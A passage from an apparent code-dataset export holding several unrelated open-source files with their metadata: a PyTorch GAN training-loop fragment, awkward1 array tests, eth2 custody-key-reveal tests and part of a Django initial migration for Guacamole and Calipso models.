                elif discriminator.label_type == "required":
                    dx = discriminator(real_inputs, labels)
                    dx_prox = prox_discriminator(real_inputs, labels)
                else:
                    # NOTE(review): assumes generator.label_type is
                    # "generated"; otherwise ``label_gen`` is undefined here.
                    dx = discriminator(real_inputs, label_gen)
                    dx_prox = prox_discriminator(real_inputs, label_gen)
                if generator.label_type == "none":
                    fake = generator(noise)
                elif generator.label_type == "required":
                    fake = generator(noise, labels)
                else:
                    fake = generator(noise, label_gen)
                if discriminator.label_type == "none":
                    dgz = discriminator(fake.detach())
                else:
                    if generator.label_type == "generated":
                        dgz = discriminator(fake.detach(), label_gen)
                    else:
                        dgz = discriminator(fake.detach(), labels)
                # Penalty: mismatch of input gradients between the live and
                # anchored discriminators.
                grad_dx = autograd.grad(torch.unbind(dx), real_inputs, create_graph=False,retain_graph=True)[0]
                grad_dx_prox = autograd.grad(torch.unbind(dx_prox), real_inputs, create_graph=False,retain_graph=True)[0]
                # NOTE(review): dim=(2,3) assumes 4-D (N, C, H, W) inputs — confirm.
                penalty = torch.mean(torch.square(torch.norm(grad_dx - grad_dx_prox,dim=(2,3))))
                loss = self.proximal_discriminator_loss.forward(dx, dgz) + self.lamda_prox*penalty
                loss.backward()
                optimizer_discriminator.step()
            if labels is None and generator.label_type == "required":
                raise Exception("GAN model requires labels for training")
            # Generator update (mirrors GeneratorLoss.train_ops).
            noise = torch.randn(batch_size, generator.encoding_dims, device=device)
            optimizer_generator.zero_grad()
            if generator.label_type == "generated":
                label_gen = torch.randint(
                    0, generator.num_classes, (batch_size,), device=device
                )
            if generator.label_type == "none":
                fake = generator(noise)
            elif generator.label_type == "required":
                fake = generator(noise, labels)
            elif generator.label_type == "generated":
                fake = generator(noise, label_gen)
            if discriminator.label_type == "none":
                dgz = discriminator(fake)
            else:
                if generator.label_type == "generated":
                    dgz = discriminator(fake, label_gen)
                else:
                    dgz = discriminator(fake, labels)
            loss = self.forward(dgz)
            self.loss = loss
            if(not self.eval_only):
                loss.backward()
                optimizer_generator.step()
            # Roll the discriminator back to its pre-inner-loop (anchor) weights.
            discriminator.load_state_dict(prox_discriminator.state_dict())
            # NOTE(avik-pal): This will error if reduction is 'none'
            return loss.item()
| 44.124786
| 252
| 0.577345
| 2,761
| 25,813
| 5.243028
| 0.077508
| 0.032053
| 0.033158
| 0.020724
| 0.946601
| 0.930437
| 0.91669
| 0.908953
| 0.901907
| 0.895966
| 0
| 0.003489
| 0.333785
| 25,813
| 584
| 253
| 44.200342
| 0.838286
| 0.362221
| 0
| 0.817629
| 0
| 0
| 0.037642
| 0.003017
| 0
| 0
| 0
| 0
| 0
| 1
| 0.036474
| false
| 0
| 0.015198
| 0
| 0.088146
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fb6a0f3a61dc30bca420a6f1eb6b1fc07fe6df12
| 4,570
|
py
|
Python
|
tests/test_0082-indexedarray-setidentities.py
|
nikoladze/awkward-1.0
|
7e1001b6ee59f1cba96cf57d144e7f2719f07e69
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_0082-indexedarray-setidentities.py
|
nikoladze/awkward-1.0
|
7e1001b6ee59f1cba96cf57d144e7f2719f07e69
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_0082-indexedarray-setidentities.py
|
nikoladze/awkward-1.0
|
7e1001b6ee59f1cba96cf57d144e7f2719f07e69
|
[
"BSD-3-Clause"
] | null | null | null |
# BSD 3-Clause License; see https://github.com/scikit-hep/awkward-1.0/blob/master/LICENSE
from __future__ import absolute_import
import sys
import pytest
import numpy
import awkward1
def test_error():
    """An index reaching past the end of the content must be rejected."""
    values = numpy.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9])
    out_of_range = numpy.array([0, 2, 4, 6, 8, 10, 12, 14], dtype=numpy.int64)
    indexedarray = awkward1.layout.IndexedArray64(
        awkward1.layout.Index64(out_of_range),
        awkward1.layout.NumpyArray(values))
    with pytest.raises(ValueError) as err:
        indexedarray.setidentities()
    assert str(err.value) == "in IndexedArray64 attempting to get 10, max(index) > len(content)"
def test_passthrough_32():
    """setidentities assigns identities to both the view and its content (int32 index)."""
    values = numpy.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9])
    picks = numpy.array([0, 2, 4, 6, 8, 9, 7, 5], dtype=numpy.int32)
    indexedarray = awkward1.layout.IndexedArray32(
        awkward1.layout.Index32(picks),
        awkward1.layout.NumpyArray(values))
    assert awkward1.to_list(indexedarray) == [0.0, 2.2, 4.4, 6.6, 8.8, 9.9, 7.7, 5.5]
    indexedarray.setidentities()
    assert numpy.asarray(indexedarray.identities).tolist() == [[i] for i in range(8)]
    assert numpy.asarray(indexedarray.content.identities).tolist() == [
        [0], [-1], [1], [-1], [2], [7], [3], [6], [4], [5]]
    assert isinstance(indexedarray.content.identities, awkward1.layout.Identities32)
def test_passthrough_U32():
    """An unsigned 32-bit index passes identities through; content gets 64-bit identities."""
    values = numpy.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9])
    picks = numpy.array([0, 2, 4, 6, 8, 9, 7, 5], dtype=numpy.uint32)
    indexedarray = awkward1.layout.IndexedArrayU32(
        awkward1.layout.IndexU32(picks),
        awkward1.layout.NumpyArray(values))
    assert awkward1.to_list(indexedarray) == [0.0, 2.2, 4.4, 6.6, 8.8, 9.9, 7.7, 5.5]
    indexedarray.setidentities()
    assert numpy.asarray(indexedarray.identities).tolist() == [[i] for i in range(8)]
    assert numpy.asarray(indexedarray.content.identities).tolist() == [
        [0], [-1], [1], [-1], [2], [7], [3], [6], [4], [5]]
    assert isinstance(indexedarray.content.identities, awkward1.layout.Identities64)
def test_passthrough_64():
    """setidentities assigns identities to both the view and its content (int64 index)."""
    values = numpy.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9])
    picks = numpy.array([0, 2, 4, 6, 8, 9, 7, 5], dtype=numpy.int64)
    indexedarray = awkward1.layout.IndexedArray64(
        awkward1.layout.Index64(picks),
        awkward1.layout.NumpyArray(values))
    assert awkward1.to_list(indexedarray) == [0.0, 2.2, 4.4, 6.6, 8.8, 9.9, 7.7, 5.5]
    indexedarray.setidentities()
    assert numpy.asarray(indexedarray.identities).tolist() == [[i] for i in range(8)]
    assert numpy.asarray(indexedarray.content.identities).tolist() == [
        [0], [-1], [1], [-1], [2], [7], [3], [6], [4], [5]]
    assert isinstance(indexedarray.content.identities, awkward1.layout.Identities64)
def test_dontpass_32():
    """With this repeated-entry index the content gets no identities (int32)."""
    values = numpy.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9])
    picks = numpy.array([0, 2, 4, 6, 8, 6, 4, 2, 0], dtype=numpy.int32)
    indexedarray = awkward1.layout.IndexedArray32(
        awkward1.layout.Index32(picks),
        awkward1.layout.NumpyArray(values))
    assert awkward1.to_list(indexedarray) == [0.0, 2.2, 4.4, 6.6, 8.8, 6.6, 4.4, 2.2, 0.0]
    indexedarray.setidentities()
    assert numpy.asarray(indexedarray.identities).tolist() == [[i] for i in range(9)]
    assert indexedarray.content.identities is None
def test_dontpass_U32():
    """With this repeated-entry index the content gets no identities (uint32)."""
    values = numpy.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9])
    picks = numpy.array([0, 2, 4, 6, 8, 6, 4, 2, 0], dtype=numpy.uint32)
    indexedarray = awkward1.layout.IndexedArrayU32(
        awkward1.layout.IndexU32(picks),
        awkward1.layout.NumpyArray(values))
    assert awkward1.to_list(indexedarray) == [0.0, 2.2, 4.4, 6.6, 8.8, 6.6, 4.4, 2.2, 0.0]
    indexedarray.setidentities()
    assert numpy.asarray(indexedarray.identities).tolist() == [[i] for i in range(9)]
    assert indexedarray.content.identities is None
def test_dontpass_64():
    """With this repeated-entry index the content gets no identities (int64)."""
    values = numpy.array([0.0, 1.1, 2.2, 3.3, 4.4, 5.5, 6.6, 7.7, 8.8, 9.9])
    picks = numpy.array([0, 2, 4, 6, 8, 6, 4, 2, 0], dtype=numpy.int64)
    indexedarray = awkward1.layout.IndexedArray64(
        awkward1.layout.Index64(picks),
        awkward1.layout.NumpyArray(values))
    assert awkward1.to_list(indexedarray) == [0.0, 2.2, 4.4, 6.6, 8.8, 6.6, 4.4, 2.2, 0.0]
    indexedarray.setidentities()
    assert numpy.asarray(indexedarray.identities).tolist() == [[i] for i in range(9)]
    assert indexedarray.content.identities is None
| 55.060241
| 122
| 0.641138
| 748
| 4,570
| 3.885027
| 0.108289
| 0.115623
| 0.052994
| 0.013765
| 0.878183
| 0.878183
| 0.878183
| 0.878183
| 0.878183
| 0.855127
| 0
| 0.123878
| 0.146827
| 4,570
| 82
| 123
| 55.731707
| 0.621441
| 0.019037
| 0
| 0.650794
| 0
| 0
| 0.014506
| 0
| 0
| 0
| 0
| 0
| 0.349206
| 1
| 0.111111
| false
| 0.095238
| 0.079365
| 0
| 0.190476
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
fb9157f2f12d3da35237746c06c0e90b1955f559
| 4,088
|
py
|
Python
|
tests/core/pyspec/eth2spec/test/phase_1/block_processing/test_process_custody_key_reveal.py
|
Leibniz137/eth2.0-specs
|
e11267952f834d7242d99d305cdcc969f35dbf6d
|
[
"CC0-1.0"
] | 1
|
2021-04-06T23:29:39.000Z
|
2021-04-06T23:29:39.000Z
|
tests/core/pyspec/eth2spec/test/phase_1/block_processing/test_process_custody_key_reveal.py
|
Leibniz137/eth2.0-specs
|
e11267952f834d7242d99d305cdcc969f35dbf6d
|
[
"CC0-1.0"
] | null | null | null |
tests/core/pyspec/eth2spec/test/phase_1/block_processing/test_process_custody_key_reveal.py
|
Leibniz137/eth2.0-specs
|
e11267952f834d7242d99d305cdcc969f35dbf6d
|
[
"CC0-1.0"
] | 1
|
2021-12-25T16:41:24.000Z
|
2021-12-25T16:41:24.000Z
|
from eth2spec.test.helpers.custody import get_valid_custody_key_reveal
from eth2spec.test.context import (
with_all_phases_except,
spec_state_test,
expect_assertion_error,
always_bls,
)
def run_custody_key_reveal_processing(spec, state, custody_key_reveal, valid=True):
    """
    Run ``process_custody_key_reveal``, yielding:
    - pre-state ('pre')
    - custody_key_reveal ('custody_key_reveal')
    - post-state ('post').
    If ``valid == False``, run expecting ``AssertionError``
    """
    yield 'pre', state
    yield 'custody_key_reveal', custody_key_reveal

    if not valid:
        # Invalid reveal: processing must raise, and there is no post-state.
        expect_assertion_error(lambda: spec.process_custody_key_reveal(state, custody_key_reveal))
        yield 'post', None
        return

    revealer = custody_key_reveal.revealer_index
    # Snapshot the revealer's counters before mutating the state.
    secret_before = state.validators[revealer].next_custody_secret_to_reveal
    lateness_before = state.validators[revealer].max_reveal_lateness

    spec.process_custody_key_reveal(state, custody_key_reveal)

    secret_after = state.validators[revealer].next_custody_secret_to_reveal
    lateness_after = state.validators[revealer].max_reveal_lateness

    # A valid reveal always advances the secret counter by exactly one.
    assert secret_after == secret_before + 1

    # Deadline epoch for this custody period; being past it means "late".
    deadline = spec.get_randao_epoch_for_custody_period(
        secret_before,
        revealer
    ) + spec.EPOCHS_PER_CUSTODY_PERIOD

    if spec.get_current_epoch(state) > deadline:
        assert lateness_after > 0
        if lateness_before == 0:
            # First-ever lateness is exactly the overshoot past the deadline.
            assert lateness_after == spec.get_current_epoch(state) - deadline
    elif lateness_before > 0:
        # Timely reveal: accumulated lateness must shrink.
        assert lateness_after < lateness_before

    yield 'post', state
@with_all_phases_except(['phase0'])
@spec_state_test
@always_bls
def test_success(spec, state):
    # Advance one full custody period so the reveal is due and timely.
    state.slot += spec.EPOCHS_PER_CUSTODY_PERIOD * spec.SLOTS_PER_EPOCH
    reveal = get_valid_custody_key_reveal(spec, state)
    yield from run_custody_key_reveal_processing(spec, state, reveal)
@with_all_phases_except(['phase0'])
@spec_state_test
@always_bls
def test_reveal_too_early(spec, state):
    # No slot advance: revealing before the custody period elapses must fail.
    reveal = get_valid_custody_key_reveal(spec, state)
    yield from run_custody_key_reveal_processing(spec, state, reveal, valid=False)
@with_all_phases_except(['phase0'])
@spec_state_test
@always_bls
def test_wrong_period(spec, state):
    # A reveal built for a far-off period (5) must be rejected.
    reveal = get_valid_custody_key_reveal(spec, state, period=5)
    yield from run_custody_key_reveal_processing(spec, state, reveal, valid=False)
@with_all_phases_except(['phase0'])
@spec_state_test
@always_bls
def test_late_reveal(spec, state):
    # Jump three custody periods plus 150 slots so the reveal arrives late.
    delay = spec.EPOCHS_PER_CUSTODY_PERIOD * spec.SLOTS_PER_EPOCH * 3 + 150
    state.slot += delay
    reveal = get_valid_custody_key_reveal(spec, state)
    yield from run_custody_key_reveal_processing(spec, state, reveal)
@with_all_phases_except(['phase0'])
@spec_state_test
@always_bls
def test_double_reveal(spec, state):
    # Two custody periods in, reveal once (unpacking drains the generator's
    # three yields so processing actually runs), then the same reveal again
    # must fail.
    state.slot += spec.EPOCHS_PER_CUSTODY_PERIOD * spec.SLOTS_PER_EPOCH * 2
    reveal = get_valid_custody_key_reveal(spec, state)
    _, _, _ = run_custody_key_reveal_processing(spec, state, reveal)
    yield from run_custody_key_reveal_processing(spec, state, reveal, valid=False)
@with_all_phases_except(['phase0'])
@spec_state_test
@always_bls
def test_max_decrement(spec, state):
    # Be very late, reveal once (unpacking drains the generator so it runs),
    # then a prompt follow-up reveal — the helper asserts lateness decreases.
    state.slot += spec.EPOCHS_PER_CUSTODY_PERIOD * spec.SLOTS_PER_EPOCH * 3 + 150
    first_reveal = get_valid_custody_key_reveal(spec, state)
    _, _, _ = run_custody_key_reveal_processing(spec, state, first_reveal)
    second_reveal = get_valid_custody_key_reveal(spec, state)
    yield from run_custody_key_reveal_processing(spec, state, second_reveal)
| 34.352941
| 116
| 0.769569
| 568
| 4,088
| 5.022887
| 0.128521
| 0.150719
| 0.229933
| 0.088328
| 0.827199
| 0.81353
| 0.767613
| 0.767613
| 0.767613
| 0.66176
| 0
| 0.006926
| 0.152397
| 4,088
| 118
| 117
| 34.644068
| 0.81645
| 0.047456
| 0
| 0.475
| 0
| 0
| 0.016831
| 0
| 0
| 0
| 0
| 0
| 0.075
| 1
| 0.0875
| false
| 0
| 0.025
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fb9783619738b92d5df58ff54d4fd02a226e04e1
| 23,051
|
py
|
Python
|
apprest/migrations/0001_initial.py
|
dsanchez-cells/calipsoplus-backend
|
7eaa6904ec59d88052644b31041b92ee20e54354
|
[
"MIT"
] | 4
|
2018-12-04T15:08:27.000Z
|
2019-04-11T09:49:41.000Z
|
apprest/migrations/0001_initial.py
|
dsanchez-cells/calipsoplus-backend
|
7eaa6904ec59d88052644b31041b92ee20e54354
|
[
"MIT"
] | 63
|
2018-11-22T13:07:56.000Z
|
2021-06-10T20:55:58.000Z
|
apprest/migrations/0001_initial.py
|
dsanchez-cells/calipsoplus-backend
|
7eaa6904ec59d88052644b31041b92ee20e54354
|
[
"MIT"
] | 10
|
2018-11-23T08:17:28.000Z
|
2022-01-15T23:41:59.000Z
|
# Generated by Django 2.0.2 on 2018-11-06 12:40
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import uuid
class Migration(migrations.Migration):
    """Initial schema for the ``apprest`` app.

    Three groups of models:
    - ``Guacamole*``: unmanaged (``'managed': False``) mirrors of an existing
      Apache Guacamole database — Django will not create or alter these tables.
    - ``Calipso*``: the app's own domain tables.
    - ``Historical*``: per-record audit shadow tables (``history_id``,
      ``history_date``, ``history_type`` bookkeeping) — presumably generated
      by django-simple-history; confirm against the app's model definitions.
    """

    initial = True

    dependencies = [
        # Depends on whichever user model AUTH_USER_MODEL points at.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
    ]

    operations = [
        # --- Unmanaged mirrors of the external Guacamole schema ---
        migrations.CreateModel(
            name='GuacamoleConnection',
            fields=[
                ('connection_id', models.AutoField(primary_key=True, serialize=False)),
                ('connection_name', models.CharField(max_length=128)),
                ('protocol', models.CharField(max_length=32)),
                ('proxy_port', models.IntegerField(blank=True, null=True)),
                ('proxy_hostname', models.CharField(blank=True, max_length=512, null=True)),
                ('proxy_encryption_method', models.CharField(blank=True, max_length=4, null=True)),
                ('max_connections', models.IntegerField(blank=True, null=True)),
                ('max_connections_per_user', models.IntegerField(blank=True, null=True)),
                ('connection_weight', models.IntegerField(blank=True, null=True)),
                ('failover_only', models.IntegerField()),
            ],
            options={
                'managed': False,
                'db_table': 'guacamole_connection',
            },
        ),
        migrations.CreateModel(
            name='GuacamoleConnectionGroup',
            fields=[
                ('connection_group_id', models.AutoField(primary_key=True, serialize=False)),
                ('connection_group_name', models.CharField(max_length=128)),
                ('type', models.CharField(max_length=14)),
                ('max_connections', models.IntegerField(blank=True, null=True)),
                ('max_connections_per_user', models.IntegerField(blank=True, null=True)),
                ('enable_session_affinity', models.IntegerField()),
            ],
            options={
                'managed': False,
                'db_table': 'guacamole_connection_group',
            },
        ),
        migrations.CreateModel(
            name='GuacamoleConnectionParameter',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('parameter_name', models.CharField(max_length=128)),
                ('parameter_value', models.CharField(max_length=4096)),
            ],
            options={
                'managed': False,
                'db_table': 'guacamole_connection_parameter',
            },
        ),
        migrations.CreateModel(
            name='GuacamoleConnectionPermission',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('permission', models.CharField(max_length=10)),
            ],
            options={
                'managed': False,
                'db_table': 'guacamole_connection_permission',
            },
        ),
        migrations.CreateModel(
            name='GuacamoleUser',
            fields=[
                ('user_id', models.AutoField(primary_key=True, serialize=False)),
                ('username', models.CharField(max_length=128, unique=True)),
                ('password_hash', models.BinaryField()),
                ('password_salt', models.BinaryField(blank=True, null=True)),
                ('password_date', models.DateTimeField()),
                ('disabled', models.IntegerField()),
                ('expired', models.IntegerField()),
                ('access_window_start', models.TimeField(blank=True, null=True)),
                ('access_window_end', models.TimeField(blank=True, null=True)),
                ('valid_from', models.DateField(blank=True, null=True)),
                ('valid_until', models.DateField(blank=True, null=True)),
                ('timezone', models.CharField(blank=True, max_length=64, null=True)),
                ('full_name', models.CharField(blank=True, max_length=256, null=True)),
                ('email_address', models.CharField(blank=True, max_length=256, null=True)),
                ('organization', models.CharField(blank=True, max_length=256, null=True)),
                ('organizational_role', models.CharField(blank=True, max_length=256, null=True)),
            ],
            options={
                'managed': False,
                'db_table': 'guacamole_user',
            },
        ),
        # --- Calipso domain tables (managed by Django) ---
        migrations.CreateModel(
            name='CalipsoAvailableImages',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('public_name', models.CharField(max_length=255, unique=True)),
                ('image', models.CharField(max_length=255)),
                ('docker_daemon', models.CharField(default='', max_length=255)),
                ('host_domain', models.CharField(default='', max_length=255)),
                ('port_hook', models.CharField(max_length=255)),
                ('logs_er', models.CharField(max_length=255)),
                ('protocol', models.CharField(max_length=25)),
                ('cpu', models.IntegerField()),
                ('memory', models.CharField(max_length=100)),
                ('hdd', models.CharField(max_length=100)),
            ],
            options={
                'db_table': 'calipso_images',
            },
        ),
        migrations.CreateModel(
            name='CalipsoContainer',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('calipso_user', models.CharField(max_length=255)),
                ('calipso_experiment', models.CharField(max_length=255)),
                ('container_id', models.CharField(max_length=255)),
                ('container_name', models.CharField(max_length=255)),
                ('container_status', models.CharField(max_length=25)),
                ('container_info', models.TextField()),
                ('container_logs', models.TextField()),
                ('guacamole_username', models.CharField(blank=True, max_length=255)),
                ('guacamole_password', models.CharField(blank=True, max_length=255)),
                ('vnc_password', models.CharField(blank=True, max_length=255)),
                ('creation_date', models.DateTimeField(blank=True, default=django.utils.timezone.now)),
                ('host_port', models.CharField(blank=True, max_length=255)),
                ('public_name', models.CharField(default='default', max_length=255)),
            ],
            options={
                'db_table': 'calipso_containers',
            },
        ),
        migrations.CreateModel(
            name='CalipsoExperiment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('subject', models.CharField(max_length=255)),
                ('body', models.TextField()),
                ('serial_number', models.CharField(blank=True, max_length=50)),
                ('beam_line', models.CharField(blank=True, max_length=200)),
            ],
            options={
                'db_table': 'calipso_experiments',
            },
        ),
        migrations.CreateModel(
            name='CalipsoFacility',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('description', models.TextField()),
                ('url', models.CharField(max_length=2083)),
            ],
            options={
                'db_table': 'calipso_facilities',
            },
        ),
        migrations.CreateModel(
            name='CalipsoSession',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('session_number', models.CharField(blank=True, max_length=50)),
                ('start_date', models.DateTimeField(blank=True, null=True)),
                ('end_date', models.DateTimeField(blank=True, null=True)),
                ('subject', models.CharField(max_length=255)),
                ('body', models.TextField()),
                ('data_set_path', models.CharField(max_length=255)),
                # Deleting an experiment cascades to its sessions.
                ('experiment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='sessions', to='apprest.CalipsoExperiment')),
            ],
            options={
                'db_table': 'calipso_sessions',
            },
        ),
        migrations.CreateModel(
            name='CalipsoUser',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('calipso_uid', models.UUIDField(default=uuid.uuid4, editable=False, unique=True)),
                ('bio', models.TextField(blank=True, max_length=500)),
                ('location', models.CharField(blank=True, max_length=30)),
                # One profile per Django auth user, reachable as user.profile.
                ('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, related_name='profile', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'db_table': 'calipso_users',
            },
        ),
        # Join table for the user<->experiment many-to-many (see AddField below).
        migrations.CreateModel(
            name='CalipsoUserExperiment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('favorite', models.BooleanField(default=False)),
                ('calipso_experiment', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='apprest.CalipsoExperiment')),
                ('calipso_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='apprest.CalipsoUser')),
            ],
            options={
                'db_table': 'calipso_user_experiment',
            },
        ),
        migrations.CreateModel(
            name='CalipsoUserQuota',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('max_simultaneous', models.IntegerField(default=5)),
                ('cpu', models.IntegerField(default=5)),
                ('memory', models.CharField(default='30G', max_length=100)),
                ('hdd', models.CharField(default='80G', max_length=100)),
                ('calipso_user', models.OneToOneField(blank=True, on_delete=django.db.models.deletion.CASCADE, to='apprest.CalipsoUser')),
            ],
            options={
                'db_table': 'calipso_quotas',
            },
        ),
        # --- Audit shadow tables: same payload columns plus history_* metadata.
        # Note their 'id' is a plain IntegerField copy; history_id is the PK,
        # and FKs use DO_NOTHING with db_constraint=False so history survives
        # deletion of the referenced rows.
        migrations.CreateModel(
            name='HistoricalCalipsoAvailableImages',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('public_name', models.CharField(db_index=True, max_length=255)),
                ('image', models.CharField(max_length=255)),
                ('docker_daemon', models.CharField(default='', max_length=255)),
                ('host_domain', models.CharField(default='', max_length=255)),
                ('port_hook', models.CharField(max_length=255)),
                ('logs_er', models.CharField(max_length=255)),
                ('protocol', models.CharField(max_length=25)),
                ('cpu', models.IntegerField()),
                ('memory', models.CharField(max_length=100)),
                ('hdd', models.CharField(max_length=100)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'get_latest_by': 'history_date',
                'ordering': ('-history_date', '-history_id'),
                'verbose_name': 'historical calipso available images',
            },
        ),
        migrations.CreateModel(
            name='HistoricalCalipsoContainer',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('calipso_user', models.CharField(max_length=255)),
                ('calipso_experiment', models.CharField(max_length=255)),
                ('container_id', models.CharField(max_length=255)),
                ('container_name', models.CharField(max_length=255)),
                ('container_status', models.CharField(max_length=25)),
                ('container_info', models.TextField()),
                ('container_logs', models.TextField()),
                ('guacamole_username', models.CharField(blank=True, max_length=255)),
                ('guacamole_password', models.CharField(blank=True, max_length=255)),
                ('vnc_password', models.CharField(blank=True, max_length=255)),
                ('creation_date', models.DateTimeField(blank=True, default=django.utils.timezone.now)),
                ('host_port', models.CharField(blank=True, max_length=255)),
                ('public_name', models.CharField(default='default', max_length=255)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'get_latest_by': 'history_date',
                'ordering': ('-history_date', '-history_id'),
                'verbose_name': 'historical calipso container',
            },
        ),
        migrations.CreateModel(
            name='HistoricalCalipsoExperiment',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('subject', models.CharField(max_length=255)),
                ('body', models.TextField()),
                ('serial_number', models.CharField(blank=True, max_length=50)),
                ('beam_line', models.CharField(blank=True, max_length=200)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'get_latest_by': 'history_date',
                'ordering': ('-history_date', '-history_id'),
                'verbose_name': 'historical calipso experiment',
            },
        ),
        migrations.CreateModel(
            name='HistoricalCalipsoFacility',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('description', models.TextField()),
                ('url', models.CharField(max_length=2083)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'get_latest_by': 'history_date',
                'ordering': ('-history_date', '-history_id'),
                'verbose_name': 'historical calipso facility',
            },
        ),
        migrations.CreateModel(
            name='HistoricalCalipsoSession',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('session_number', models.CharField(blank=True, max_length=50)),
                ('start_date', models.DateTimeField(blank=True, null=True)),
                ('end_date', models.DateTimeField(blank=True, null=True)),
                ('subject', models.CharField(max_length=255)),
                ('body', models.TextField()),
                ('data_set_path', models.CharField(max_length=255)),
                ('history_id', models.AutoField(primary_key=True, serialize=False)),
                ('history_date', models.DateTimeField()),
                ('history_change_reason', models.CharField(max_length=100, null=True)),
                ('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
                ('experiment', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='apprest.CalipsoExperiment')),
                ('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
            ],
            options={
                'get_latest_by': 'history_date',
                'ordering': ('-history_date', '-history_id'),
                'verbose_name': 'historical calipso session',
            },
        ),
        migrations.CreateModel(
            name='HistoricalCalipsoUser',
            fields=[
                ('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
                ('calipso_uid', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False)),
                ('bio', models.TextField(blank=True, max_length=500)),
